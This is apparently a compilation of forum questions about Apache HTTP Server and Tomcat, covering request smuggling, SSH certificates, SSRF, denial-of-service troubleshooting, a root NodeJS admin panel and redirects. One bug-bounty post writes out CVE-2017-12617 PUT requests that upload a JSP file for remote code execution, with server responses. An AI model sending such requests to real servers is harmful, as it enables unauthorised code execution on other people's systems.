Force Apache Server/Tomcat to ignore Transfer-Encoding

I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end.

Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible with this configuration?

Using apache mina for ssh using signed ssh-rsa-cert-01 from Certification Authority

There is an existing client configured and running (SshClient) using apache mina to ssh to one of our internal jump boxes. It currently uses PEM based authentication. Due to compliance we have to switch to using internally signed certificates (internally we are using hashicorp vault as a CA). I’m unable to find any documentation regarding how to use signed certificates for ssh in apache mina to start with. Is it not supported? Will I perhaps have to use any other java ssh library?

Kafka source code on github and from the apache website is missing the “org.apache.kafka.common.message.” package? [closed]

I tried downloading the source code of Kafka from Github as well as from Apache’s website. I found that both the sources were missing the “org.apache.kafka.common.message.” package. Can anybody kindly let me know why this might be the case.

Kindly note that I had downloaded the source of “AK RELEASE 2.5.0” from Apache’s website. Similarly I used “trunk” branch from the current github repository for kafka.

What measures can I take to prevent Server Side Request Forgery (SSRF) in a JAX-RS Application running on Apache Tomcat?

If I have a an application server that uses an implementation of JAX-RS, and is running as *.war file on an Apache Tomcat server, is there anything special that needs to be done or configured to prevent SSRF attacks?

My naive understanding is that JAX-RS application are only serving requests to certain URLs and Apache Tomcat only allows requests to certain resources.

If this is handled by default by JAX-RS or Apache Tomcat, could you explain how?

If this is not handled by default by JAX-RS nor Apache Tomcat, could you explain the best way to prevent this type of attack with these tools?

Specific versions:

  • JAX-RS api 2.1
  • Apache Tomcat 9.0.33

Vulnerable Apache Tomcat server

I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Talk about Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.

Any Apache Tomcat server with enabled PUT request method will allow the attacker to create a JSP file in the server through a crafted request and will lead to RCE:

PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://vulnerable.com/public/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2 Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94 Connection: close Content-Length: 26  <% out.println("hello");%> 

And after some testing, I found that the server enabled the PUT method. But when I sent the exploit request, there is an error:

PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26  <% out.println("hello");%>     HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 389 Date: Fri, 17 Apr 2020 02:07:24 GMT Connection: close  <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot; o&quot;</div></body></html> 

I found that the error is from the Java URLDecoder. The server may has decoded the content in the body of the request, but the % o is not a valid URL character, so the error turns out. It proves that the server has handled the request, it may works but not. Then I try this:

PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26  <%25 out.println("hello");%25>     HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295  <!DOCTYPE html> <!--   ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.   ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   -->  <html> <head>   <title>VULNEARBLE</title> ... 

It gave me back a 404 response. I have tried the POST but it just proves that there is a special thing in the PUT method:

POST /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26  <% out.println("hello");%>     HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295  <!DOCTYPE html> <!--   ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.   ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   -->  <html> <head>   <title>VULNEARBLE</title> ... 

(The POST request even does not appear any error or response). I have checked the 1.jsp file but it hasn’t been created yet:

GET /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26     HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295  <!DOCTYPE html> <!--   ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.   ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   -->  <html> <head>   <title>VULNEARBLE</title> ... 

Does anyone know what is happens and what should I do next?

apache server under attack

Hi all,
I run a small community . Iam using apache web server with smf forums on a vps with centos 7. I have all good firewalls going (csf) . Iam trying to solve an issue with a user crashing my7 forums. The memory on the vps and cpu will spike to 100% and create a "cannot connect to mysql database" error. on the apache error logs I get a mpm_prefork error showing AH00159 error out of memory. can anyone tell me how to prevent this attack. thanks.

Apache site down after getting AH02032 error

Apache site down after getting AH02032 error, and automatically up if I restart apache or after some time(maybe 1-3 hours). The Server setup is Xampp in Windows Server 2012 Many sites are hosted on the same server with virtual host setup, All domains except the error one are working without any problem.

Error Log:

[Tue Mar 10 19:17:00.320296 2020] [:error] [pid 6776:tid 1824] [client 5.101.0.209:55464] script 'C:/xampp/htdocs/WEBSITES/************/index.php' not found or unable to stat  [Wed Mar 11 05:53:30.164225 2020] [ssl:error] [pid 6776:tid 1812] AH02032: Hostname 13.127.**.** provided via SNI and hostname btcoworld.com provided via HTTP are different 

Access Log:

may be unknown connection:

209.17.96.74 - - [11/Mar/2020:05:47:56 +0000] "GET / HTTP/1.1" 200 49594 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http:// cloudsystemnetworks.com)"  54.190.178.146 - - [11/Mar/2020:05:52:25 +0000] "GET / HTTP/1.1" 200 49594 "-" "Go-http-client/1.1"  212.92.115.37 - - [11/Mar/2020:05:53:30 +0000] "GET https:// btcoworld.com/ HTTP/1.1" 400 1015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"  157.55.39.31 - - [11/Mar/2020:05:55:47 +0000] "GET /robots.txt HTTP/1.1" 404 26 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http:// www.bing.com/bingbot.htm)"  207.46.13.155 - - [11/Mar/2020:05:55:53 +0000] "GET /dashboard/de/faq.html HTTP/1.1" 404 26 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http:// www.bing.com/bingbot.htm)" 

So my question is how should I prevent the site from getting down, and these errors/Attacks? Thanks

Rate my idea: NodeJS as root behind Apache as a proxy with password

I’m the admin of a small Linux server owned by a relative of mine. He’s fairly tech savvy, but more at a level of a power user than an expert. I want to make a handy visual tool for him that would allow to do some simple server tasks: add/remove users and change their passwords; set up/remove websites; set up/remove mailboxes (I’ve decoupled those from system users so it’s a separate task if needed); and perhaps something else as needed.

Most of these things can be done from command line and some require the editing of some config files, but lengthy incantations with a lot of changing parts is just asking for trouble. I’d rather have a handy script.

The trouble is: most of these tasks require superuser permissions. He already has that, so I could make a textmode tool (which requires to be run as root), but a website would be so much nicer.

There’s already an apache webserver in place on port 80, bit running that as root would obviously be a lousy idea. Similarly, I don’t want to store root password anywhere.

So I had the idea of making the website in NodeJS and running the Node process as root, listening only on a specific port which only accepts incoming connections from localhost. Then Apache would be a non-elevated proxy in front of the NodeJS app. In addition, both Apache and NodeJS would ask for a password (taken from the same .htpasswd file).

If you can’t enter the password to Apache, you can’t even get to Node. If you hack Apache (or have access to some local account) you still need the password to get the Node app to cooperate.

Would this be safe enough? Ok, that’s kinda subjective, but considering that I’m more worried about opportunistic hackers from outside than malicious local users, would this be ok? There’s really nothing of much value stored on the server; I don’t expect anyone to do targeted hacking because there’s not much to gain (Wanna see pictures of my kids? You’re welcome…) I consider automated scanners and hackers trying to add to their botnets/db leaks the main threat. Any other suggestions on how to achieve this maybe?

Apache, Redirect is not working for substring

Issue

In apache, how can I redirect to homepage in case if you will go to exact string, but everything behind this string should be displayed normally, no redirect.

Example.

http://example.com/STRING -> go to homepage http://example.com/STRING_PAGE -> go to http://example.com/STRING_PAGE 

I tried

Redirect 301 /STRING http://example.com/ 

But in this case page is redirected to homepage too, for example in case of http://example.com/STRING_PAGE.

Thanks.